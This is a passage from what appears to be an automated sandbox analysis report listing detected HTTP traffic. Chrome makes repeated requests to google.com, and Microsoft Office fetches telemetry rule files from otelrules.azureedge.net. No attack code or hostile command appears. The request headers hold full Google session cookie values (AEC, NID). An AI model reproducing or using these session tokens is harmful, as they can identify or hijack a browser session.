yem,sy86,uxMpU,syei,sybp,sybn,sybj,syat,sybl,sybg,sy8p,sy8o,sy8n,Mlhmy,QGR0gd,aurFic,sy8y,fKUV3e,OTA3Ae,sy8a,OmgaI,EEDORb,PoEs9b,Pjplud,sy8j,A1yn5d,YIZmRd,uY49fb,sy7y,sy7w,sy7u,sy7v,sy7t,sy7s,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy19f,sy19d,syxe,sytj,d5EhJe,sy19w,fCxEDd,syup,sy19v,sy19u,sy19t,sy19m,sy19j,sy19k,sy174,sy16y,syx2,syx1,T1HOxc,sy19l,sy19i,zx30Y,sy19y,sy19x,sy19q,sy15r,Wo3n8,sysv,loL8vb,sysz,sysy,sysx,ms4mZb,syrx,B2qlPe,syua,NzU6V,syyt,sygi,zGLm3b,syvu,syvv,syvl,DhPYme,syxz?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=syxu,syxx,syxw,sywe,sywf,syxv,syxs,syxt,KHourd,MpJwZc,UUJqVe,sy7d,sOXFj,sy7c,s39S4,oGtAuc,NTMZac,nAFL3,sy7q,sy7p,q0xTif,y05UD,sy12f,sy18v,sy18p,syx0,sy18i,sywz,sywy,sywx,sy18o,sy13p,sy18f,sy13t,sy18n,sy12b,sy18j,sygz,sy13u,sy18q,sy122,sy18m,sy18k,sy18l,sy18s,sy18a,sy18g,sy189,sy18e,sy18b,sy186,sy14p,sy13w,sy13x,syx5,syx6,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /client_204?atyp=i&biw=1034&bih=870&ei=7TpQZ5ybCP7V7M8PhYbCIQ&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=sb_wiz,aa,abd,sy17h,syfu,syfl,syfj,syfk,syfm,syfv,syfw,syfq,syfr,syfp,syfo,syel,syfn,syfd,syfc,syfe,syfb,syfg,sy16c,syg6,sy17f,syyh,syg5,syg4,syg3,async,ifl,pHXghd,sf,syic,sy3jj,sonic,sy3jp,syhi,sygy,sy3j2,sy3j5,sy265,sydz,sy9w,sy9h,sy9g,spch,syte,sytd,rtH1bd,sy19c,sy15f,sy14w,sy125,syd8,sy19b,SMquOb,sy89,sy88,syez,syf8,syf6,syf5,syey,syew,syeu,sy83,sy80,sy82,syet,syex,syes,sybf,syba,sybd,syal,syar,syak,syaj,syai,sya6,sybb,syaz,syb0,syb6,syap,syb5,syay,syav,syag,syan,syb1,sya8,syaa,syab,sya7,syaq,syaf,syac,sybi,sya2,sy9z,sybh,sy9r,sy9j,sy9m,sy9y,sya5,syb2,syer,syeq,syen,syem,sy86,uxMpU,syei,sybp,sybn,sybj,syat,sybl,sybg,sy8p,sy8o,sy8n,Mlhmy,QGR0gd,aurFic,sy8y,fKUV3e,OTA3Ae,sy8a,OmgaI,EEDORb,PoEs9b,Pjplud,sy8j,A1yn5d,YIZmRd,uY49fb,sy7y,sy7w,sy7u,sy7v,sy7t,sy7s,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy19f,sy19d,syxe,sytj,d5EhJe,sy19w,fCxEDd,syup,sy19v,sy19u,sy19t,sy19m,sy19j,sy19k,sy174,sy16y,syx2,syx1,T1HOxc,sy19l,sy19i,zx30Y,sy19y,sy19x,sy19q,sy15r,Wo3n8,sysv,loL8vb,sysz,sysy,sysx,ms4mZb,syrx,B2qlPe,syua,NzU6V,syyt,sygi,zGLm3b,syvu,syvv,syvl,DhPYme,syxz?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=syxu,syxx,syxw,sywe,sywf,syxv,syxs,syxt,KHourd,MpJwZc,UUJqVe,sy7d,sOXFj,sy7c,s39S4,oGtAuc,NTMZac,nAFL3,sy7q,sy7p,q0xTif,y05UD,sy12f,sy18v,sy18p,syx0,sy18i,sywz,sywy,sywx,sy18o,sy13p,sy18f,sy13t,sy18n,sy12b,sy18j,sygz,sy13u,sy18q,sy122,sy18m,sy18k,sy18l,sy18s,sy18a,sy18g,sy189,sy18e,sy18b,sy186,sy14p,sy13w,sy13x,syx5,syx6,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsXRange: bytes=76656-76656If-Range: Tue, 03 Dec 2024 22:30:27 GMT
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=syxu,syxx,syxw,sywe,sywf,syxv,syxs,syxt,KHourd,MpJwZc,UUJqVe,sy7d,sOXFj,sy7c,s39S4,oGtAuc,NTMZac,nAFL3,sy7q,sy7p,q0xTif,y05UD,sy12f,sy18v,sy18p,syx0,sy18i,sywz,sywy,sywx,sy18o,sy13p,sy18f,sy13t,sy18n,sy12b,sy18j,sygz,sy13u,sy18q,sy122,sy18m,sy18k,sy18l,sy18s,sy18a,sy18g,sy189,sy18e,sy18b,sy186,sy14p,sy13w,sy13x,syx5,syx6,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsXRange: bytes=76656-83058If-Range: Tue, 03 Dec 2024 22:30:27 GMT
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=syxu,syxx,syxw,sywe,sywf,syxv,syxs,syxt,KHourd,MpJwZc,UUJqVe,sy7d,sOXFj,sy7c,s39S4,oGtAuc,NTMZac,nAFL3,sy7q,sy7p,q0xTif,y05UD,sy12f,sy18v,sy18p,syx0,sy18i,sywz,sywy,sywx,sy18o,sy13p,sy18f,sy13t,sy18n,sy12b,sy18j,sygz,sy13u,sy18q,sy122,sy18m,sy18k,sy18l,sy18s,sy18a,sy18g,sy189,sy18e,sy18b,sy186,sy14p,sy13w,sy13x,syx5,syx6,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
